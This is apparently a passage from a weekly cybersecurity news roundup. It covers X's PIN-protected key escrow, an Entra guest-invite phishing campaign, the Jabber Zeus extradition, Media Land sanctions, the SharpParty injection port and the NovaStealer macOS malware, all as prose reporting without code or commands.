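With a 4-digit PIN the whole space is 10,000 KDF evaluations, so raising the iteration count only changes whether the search takes seconds or minutes. What actually protects an escrowed key is a server that enforces an attempt limit and erases the blob after a few failures, ideally inside hardware the operator cannot bypass; whether X does this is not stated in its announcement, so treat the PIN as the weakest link until it is.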

The company continued: “Users are prompted to enter a PIN (which never leaves the device), which is used to keep the private key securely stored on X’s infrastructure. This private key can then be recovered from any device if the user knows the PIN. In addition to the private-public key pairs, there is a per-conversation key that is used to encrypt the content of the messages. The private-public key pairs are used to exchange the conversation key securely between participating users.”

Fake Microsoft invites fuel voice-phishing scam
Phishing Campaign Uses Entra Guest User Invites for TOAD Attacks

A new phishing campaign has been observed weaponizing Microsoft Entra guest user invitations to deceive recipients into making phone calls to attackers posing as Microsoft support.

The campaign uses Microsoft Entra tenant invitations sent from the legitimate invites@microsoft[.]com address to bypass email filters and establish trust with targets.

Jabber Zeus coder extradited to face U.S. justice
Ukrainian Extradited to U.S. Faces Charges in Jabber Zeus Case

A Ukrainian national believed to be a developer for the Jabber Zeus cybercrime group has reportedly been extradited from Italy to the U.S.

The man, Yuriy Igorevich Rybtsov, 41, of Donetsk, is alleged to be MrICQ (aka John Doe #3), according to a report from security journalist Brian Krebs. He is accused of handling notifications of newly compromised entities, as well as of laundering the illicit proceeds from the scheme. Another member of the group, Vyacheslav “Tank” Igorevich Penchukov, pleaded guilty to his role in two different malware schemes, Zeus and IcedID, in February 2024. Later that July, he was sentenced to 18 years and ordered to pay more than $73 million in restitution to victims.

Speaking exclusively to the BBC earlier this month, the 39-year-old described himself as a “friendly guy.” At one point, he ditched cybercrime to start a company buying and selling coal, only to be lured back into it due to business troubles and the promise of good money by becoming a ransomware affiliate. In the meantime, he has been making the most of his prison time, getting high-school diplomas and learning French and English. Penchukov also acknowledged that Russian cybercrime groups worked with security services, such as the FSB. “You can’t make friends in cybercrime, because the next day, your friends will be arrested and they will become an informant,” he was quoted as saying.

“Paranoia is a constant friend of hackers.” In a report published this month, Analyst1 researcher Anastasia Sentsova said, “the Russian state has gotten its hands dirty and set up several hacktivist groups to support its war in Ukraine.”

Media Land hit with sanctions over ransomware links
Russian Bulletproof Hosting Provider Media Land Sanctioned for Ransomware Ties

The U.S., the U.K., and Australia have sanctioned Russian bulletproof hosting (BPH) provider Media Land and its executives, including general director Aleksandr Volosovik (aka Yalishanda), for providing services to cybercrime and ransomware groups like Evil Corp, LockBit, Black Basta, BlackSuit, and Play. The U.S. Treasury Department’s Office of Foreign Assets Control (OFAC) has also designated Hypercore Ltd., a front company of Aeza Group LLC (Aeza Group), along with two additional individuals and two entities that have led, materially supported, or acted for Aeza Group, namely Maksim Vladimirovich Makarov, Ilya Vladislavovich Zakirov, Smart Digital Ideas DOO, and Datavice MCHJ. “These so-called bulletproof hosting service providers like Media Land provide cybercriminals essential services to aid them in attacking businesses in the United States and in allied countries,” said Under Secretary of the Treasury for Terrorism and Financial Intelligence John K. Hurley.

In tandem, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) issued an alert to help internet service providers and network defenders mitigate the risks posed by BPH providers. “These providers enable malicious activities such as ransomware, phishing, malware delivery, and denial-of-service (DoS) attacks, posing an imminent and significant risk to the resilience and safety of critical systems and services,” CISA said.

Researchers reengineer PoolParty in C#
Porting PoolParty from C++ to C#

Cybersecurity researchers have released a C# implementation of PoolParty, a collection of process injection techniques that target Windows thread pools to evade endpoint detection and response (EDR) systems. PoolParty was first detailed by SafeBreach in late 2023. Its C# implementation, codenamed SharpParty by Trustwave and Stroz Friedberg, enables the PoolParty techniques to be used in tools that leverage inline MSBuild tasks in XML files.

New macOS malware hijacks crypto apps
New NovaStealer Spotted

Cybersecurity researchers have detailed a new macOS stealer called NovaStealer that can exfiltrate wallet-related files, collect telemetry data, and replace legitimate Ledger and Trezor applications with tampered copies.

“An unknown dropper fetches and runs mdriversinstall.sh, which installs a small scripts orchestrator under ~/.mdrivers and registers a LaunchAgent labeled application.com.artificialintelligence,” a security researcher who goes by the name Bruce said. “This orchestrator pulls additional scripts encoded in b64 from the C2, drops them under ~/.mdrivers/scripts, and runs them in detached screen sessions in the background. It supports updates and handles the restart of responsible screen sessions.”

Every week, new online dangers pop up. Real stories show how much our daily lives depend on the internet.

The same apps and tools that make life quicker and easier can also let bad guys in. It’s not just for experts anymore. Anyone who goes online, clicks links, or shares stuff needs to pay attention. Governments try to catch hackers, and experts find secret weak spots.

But one thing is always true: keeping our digital world safe never ends. The best thing we can do is learn from what happens, fix our apps and passwords, and watch out for new tricks. I’ll keep sharing simple updates and closer looks at the big stories about cyber threats, privacy, and staying safe online.
